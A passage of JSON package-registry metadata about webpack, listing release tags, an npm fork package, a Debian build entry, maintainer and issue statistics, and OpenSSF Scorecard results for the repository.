.0-rc4","sha":"6b7c23fb3181fa118a69ba3e320eb9ff57f249a4","kind":"commit","published_at":"2014-02-11T11:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4/manifests"},{"name":"v1.0.0-rc3","sha":"60684612b21b2f9481073fade5dbf0b0743fe833","kind":"commit","published_at":"2014-02-05T11:37:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"81d90ac4b8860ebb9ab3e5485a804becbd18c1ca","kind":"commit","published_at":"2014-02-05T11:05:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2/manifests"},{"name":"v1.0.0-rc1","sha":"5965a3a96a711629bcde184162c0f25f51da80dc","kind":"commit","published_at":"2014-02-03T17:21:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1/manifests"},{"name":"v1.0.0-beta9","sha":"0752c3bfff32b0a5beca6b8da5f6bd7eb34abd0e","kind":"commit","published_at":"2014-01-31T13:09:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9/manifests"},{"name":"v1.0.0-beta8","sha":"e58f315f321e6535a9ff34a8b87f949919dace01","kind":"commit","published_at":"2014-01-24T12:33:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8/manifests"},{"name":"v1.0.0-beta7","sha":"8be2e5a14ac873b703119362b5c3447eb8e5f60e","kind":"commit","published_at":"2014-01-21T15:25:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7/manifests"},{"name":"v1.0.0-beta6","sha":"a9fc61ff1a22091135f183809fb537a1325e532b","kind":"commit","published_at":"2014-01-10T09:49:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6/manifests"},{"name":"v1.0.0-beta5","sha":"cf45c9cd1cce6e3136894ace4f9ae8618d1211a1","kind":"commit","published_at":"2014-01-08T18:23:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5/manifests"},{"name":"v1.0.0-beta4","sha":"df0f3687db404a87eab75af62504828ce13dd03d","kind":"commit","published_at":"2013-12-29T11:21:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4/manifests"},{"name":"v1.0.0-beta3","sha":"a4c58898ff5395124ac8e2cf79c25095fbe8a98e","kind":"commit","published_at":"2013-12-29T11:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3/manifests"},{"name":"v1.0.0-beta2","sha":"f30bcfbd5793f9282d7dedb0ea0a20674f763fed","kind":"commit","published_at":"2013-12-19T22:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2/manifests"}]},"repo_metadata_updated_at":"2026-08-15T12:14:28.469Z","dependent_packages_count":0,"downloads":8,"downloads_period":"last-month","dependent_repos_count":1,"rankings":{"downloads":59.88173098450381,"dependent_repos_count":10.295976646711454,"dependent_packages_count":51.836728746128266,"stargazers_count":0.07834503466984864,"forks_count":0.39276155743318475,"docker_downloads_count":null,"average":24.497108593889315},"purl":"pkg:npm/webpack-no-postintall-fail","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/webpack-no-postintall-fail","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/webpack-no-postintall-fail","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/webpack-no-postintall-fail/dependencies","status":"unpublished","funding_links":["https://opencollective.com/webpack"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-15T00:33:00.468Z","issues_count":10162,"pull_requests_count":9346,"avg_time_to_close_issue":10799871.641803114,"avg_time_to_close_pull_request":2735107.9374077017,"issues_closed_count":9894,"pull_requests_closed_count":8803,"pull_request_authors_count":1440,"issue_authors_count":6683,"avg_comments_per_issue":5.833989372170833,"avg_comments_per_pull_request":3.1409158998502034,"merged_pull_requests_count":5955,"bot_issues_count":8,"bot_pull_requests_count":2902,"past_year_issues_count":82,"past_year_pull_requests_count":870,"past_year_avg_time_to_close_issue":883593.0892857143,"past_year_avg_time_to_close_pull_request":415674.9065281899,"past_year_issues_closed_count":56,"past_year_pull_requests_closed_count":674,"past_year_pull_request_authors_count":78,"past_year_issue_authors_count":64,"past_year_avg_comments_per_issue":3.24390243902439,"past_year_avg_comments_per_pull_request":4.531034482758621,"past_year_bot_issues_count":1,"past_year_bot_pull_requests_count":134,"past_year_merged_pull_requests_count":531,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/issues","maintainers":[{"login":"sokra","count":1358,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sokra"},{"login":"alexander-akait","count":1025,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"vankop","count":196,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vankop"},{"login":"ooflorent","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ooflorent"},{"login":"TheLarkInn","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheLarkInn"},{"login":"hai-x","count":121,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"timse","count":100,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/timse"},{"login":"snitin315","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/snitin315"},{"login":"jhnns","count":78,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jhnns"},{"login":"xtuc","count":54,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xtuc"},{"login":"smelukov","count":52,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/smelukov"},{"login":"bjohansebas","count":41,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"evenstensberg","count":37,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"chenxsan","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chenxsan"},{"login":"Legends","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Legends"},{"login":"Jessidhia","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Jessidhia"},{"login":"ScriptedAlchemy","count":31,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ScriptedAlchemy"},{"login":"avivkeller","count":27,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"jamesgeorge007","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jamesgeorge007"},{"login":"michael-ciniawsky","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/michael-ciniawsky"},{"login":"EugeneHlushko","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/EugeneHlushko"},{"login":"Connormiha","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Connormiha"},{"login":"hiroppy","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hiroppy"},{"login":"samccone","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/samccone"},{"login":"SpaceK33z","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/SpaceK33z"},{"login":"mc-zone","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mc-zone"},{"login":"sendilkumarn","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sendilkumarn"},{"login":"gajus","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gajus"},{"login":"byzyk","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/byzyk"},{"login":"ljqx","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljqx"},{"login":"gpoitch","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gpoitch"},{"login":"nveenjain","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nveenjain"},{"login":"kentcdodds","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kentcdodds"},{"login":"jbottigliero","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jbottigliero"},{"login":"JounQin","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/JounQin"},{"login":"edmorley","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edmorley"},{"login":"montogeek","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/montogeek"},{"login":"elliottsj","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/elliottsj"},{"login":"burhanuday","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/burhanuday"},{"login":"pierreneter","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pierreneter"},{"login":"Janpot","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Janpot"},{"login":"ovflowd","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"},{"login":"billyjanitsch","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/billyjanitsch"},{"login":"keblodev","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/keblodev"},{"login":"shama","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shama"},{"login":"anikethsaha","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anikethsaha"},{"login":"ljcrapo","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljcrapo"},{"login":"matheus1lva","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/matheus1lva"},{"login":"rishabh3112","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rishabh3112"},{"login":"joshwiens","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/joshwiens"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"reergymerej","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/reergymerej"},{"login":"jeremenichelli","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jeremenichelli"},{"login":"aboktor","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aboktor"},{"login":"MrKou47","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/MrKou47"},{"login":"mikegreiling","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mikegreiling"},{"login":"eemeli","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/eemeli"},{"login":"mattlewis92","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mattlewis92"},{"login":"pranshuchittora","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pranshuchittora"},{"login":"3ru","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/3ru"},{"login":"ryanclark","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ryanclark"},{"login":"sapegin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sapegin"},{"login":"loveky","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/loveky"},{"login":"edocipriano","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edocipriano"},{"login":"PatrickJS","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/PatrickJS"},{"login":"jevancc","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jevancc"},{"login":"chrisdothtml","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chrisdothtml"},{"login":"anshumanv","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anshumanv"}],"active_maintainers":[{"login":"alexander-akait","count":389,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"hai-x","count":81,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":56,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"bjohansebas","count":41,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"avivkeller","count":27,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"evenstensberg","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"ovflowd","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack-no-postintall-fail/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack-no-postintall-fail/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack-no-postintall-fail/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack-no-postintall-fail/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack-no-postintall-fail/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack-no-postintall-fail/codemeta","maintainers":[{"uuid":"rtarnaud","login":"rtarnaud","name":null,"email":"razvan.tarnaud@gmail.com","url":null,"packages_count":5,"html_url":"https://www.npmjs.com/~rtarnaud","role":null,"created_at":"2022-11-15T10:40:50.550Z","updated_at":"2022-11-15T10:40:50.550Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/rtarnaud/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5816876,"maintainers_count":1245095,"namespaces_count":426640,"keywords_count":889778,"github":"npm","metadata":{"funded_packages_count":192526,"rate_limit":2},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-09-02T05:02:10.244Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":13702760,"name":"node-webpack","ecosystem":"debian","description":null,"homepage":"https://github.com/webpack/webpack","licenses":"mit","normalized_licenses":["MIT"],"repository_url":"https://github.com/webpack/webpack","keywords_array":["misc"],"namespace":"main","versions_count":1,"first_release_published_at":"2026-02-12T21:27:19.123Z","latest_release_published_at":"2026-02-12T21:27:19.123Z","latest_release_number":"5.75.0+dfsg+~cs17.16.14-1+deb12u1","last_synced_at":"2026-03-13T20:42:05.454Z","created_at":"2026-02-12T21:27:18.937Z","updated_at":"2026-08-22T20:12:37.296Z","registry_url":"https://tracker.debian.org/pkg/node-webpack","install_command":"apt-get install node-webpack","documentation_url":"https://packages.debian.org/bookworm/node-webpack","metadata":{"component":"main","architecture":"all","priority":"extra","binary":"webpack","standards_version":"4.6.1","maintainer":"Debian Javascript Maintainers \u003cpkg-javascript-devel@lists.alioth.debian.org\u003e","build_depends":"debhelper-compat (= 13), dh-nodejs, dh-sequence-nodejs, jest (\u003e= 29) \u003c!nocheck\u003e, node-acorn (\u003e= 8.5.0+ds+~cs24.17.6~), node-babel7, node-browserslist \u003c!nocheck\u003e, node-chrome-trace-event \u003c!nocheck\u003e, node-colorette, node-commander, node-enhanced-resolve \u003c!nocheck\u003e, node-es-module-lexer, node-eslint-scope \u003c!nocheck\u003e, node-eslint-visitor-keys, node-esrecurse \u003c!nocheck\u003e, node-estraverse \u003c!nocheck\u003e, node-events \u003c!nocheck\u003e, node-findup-sync \u003c!nocheck\u003e, node-graceful-fs \u003c!nocheck\u003e, node-interpret (\u003e= 2.2~) \u003c!nocheck\u003e, node-json-parse-better-errors \u003c!nocheck\u003e, node-libs-browser \u003c!nocheck\u003e, node-loader-runner \u003c!nocheck\u003e, node-mime-types \u003c!nocheck\u003e, node-neo-async \u003c!nocheck\u003e, node-p-limit \u003c!nocheck\u003e, node-rechoir, node-resolve-cwd \u003c!nocheck\u003e, node-rollup-plugin-commonjs, node-rollup-plugin-json, node-rollup-plugin-node-resolve, node-rollup-plugin-terser, node-schema-utils \u003c!nocheck\u003e, node-supports-color \u003c!nocheck\u003e, node-tapable (\u003e= 2.0~), node-typescript, node-watchpack \u003c!nocheck\u003e, node-webassemblyjs (\u003e= 1.9.1+dfsg+~cs11.9.35~) \u003c!nocheck\u003e, node-webpack-merge (\u003e= 5.8.0~), node-webpack-sources (\u003e= 3.2.1~) \u003c!nocheck\u003e, node-yargs \u003c!nocheck\u003e, rollup, terser \u003c!nocheck\u003e","build_depends_indep":null,"build_depends_arch":null},"repo_metadata":{"id":2686067,"uuid":"3678731","full_name":"webpack/webpack","owner":"webpack","description":"A bundler for javascript and friends. Packs many modules into a few bundled assets. Code Splitting allows for loading parts of the application on demand. Through \"loaders\", modules can be CommonJs, AMD, ES6 modules, CSS, Images, JSON, Coffeescript, LESS, ... and your custom stuff.","archived":false,"fork":false,"pushed_at":"2026-08-22T00:09:57.000Z","size":95341,"stargazers_count":65973,"open_issues_count":138,"forks_count":9525,"subscribers_count":1466,"default_branch":"main","last_synced_at":"2026-08-22T13:33:37.681Z","etag":null,"topics":["amd","build-tool","commonjs","compiler","es2015","es6","esm","javascript","javascript-compiler","javascript-modules","loaders","module-bundler","plugins","web","web-performance","webpack"],"latest_commit_sha":null,"homepage":"https://webpack.js.org","language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/webpack.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":"GOVERNANCE.md","roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":"AGENTS.md","claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":null,"dco":null,"cla":null,"disclosure":null},"funding":{"open_collective":"webpack"}},"created_at":"2012-03-10T10:08:14.000Z","updated_at":"2026-08-22T08:28:27.000Z","dependencies_parsed_at":"2026-08-08T12:34:57.314Z","dependency_job_id":null,"html_url":"https://github.com/webpack/webpack","commit_stats":{"total_commits":12493,"total_committers":934,"mean_commits":"13.375802997858672","dds":0.5586328343872569,"last_synced_commit":"89dfc9a5c575dc691e3ac6a965d39c854fca3986"},"previous_names":[],"tags_count":670,"template":false,"template_full_name":null,"purl":"pkg:github/webpack/webpack","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/sbom","scorecard":{"id":546233,"data":{"date":"2025-07-28","repo":{"name":"github.com/webpack/webpack","commit":"de79ee457eb921e6e1b186c90c65590789a013ca"},"scorecard":{"version":"v5.2.1-26-g4feedb85","commit":"4feedb857ab8d82158aa9774bf8054df41992180"},"score":6,"checks":[{"name":"Code-Review","score":5,"reason":"Found 12/24 approved changesets -- score normalized to 5","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#code-review"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#packaging"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 12 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:6","Info: topLevel 'contents' permission set to 'read': .github/workflows/examples.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/test.yml:13","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#token-permissions"}},{"name":"Security-Policy","score":9,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Warn: One or no descriptive hints of disclosure, vulnerability, and/or timelines in security policy","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#cii-best-practices"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#branch-protection"}},{"name":"Binary-Artifacts","score":0,"reason":"binaries present in source code","details":["Warn: binary detected: examples/nodejs-addons/file.node:1","Warn: binary detected: examples/wasm-bindgen-esm/pkg/hi_wasm_bg.wasm:1","Warn: binary detected: examples/wasm-simple/add.wasm:1","Warn: binary detected: examples/wasm-simple/factorial.wasm:1","Warn: binary detected: examples/wasm-simple/fibonacci.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory2.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory3.wasm:1","Warn: binary detected: 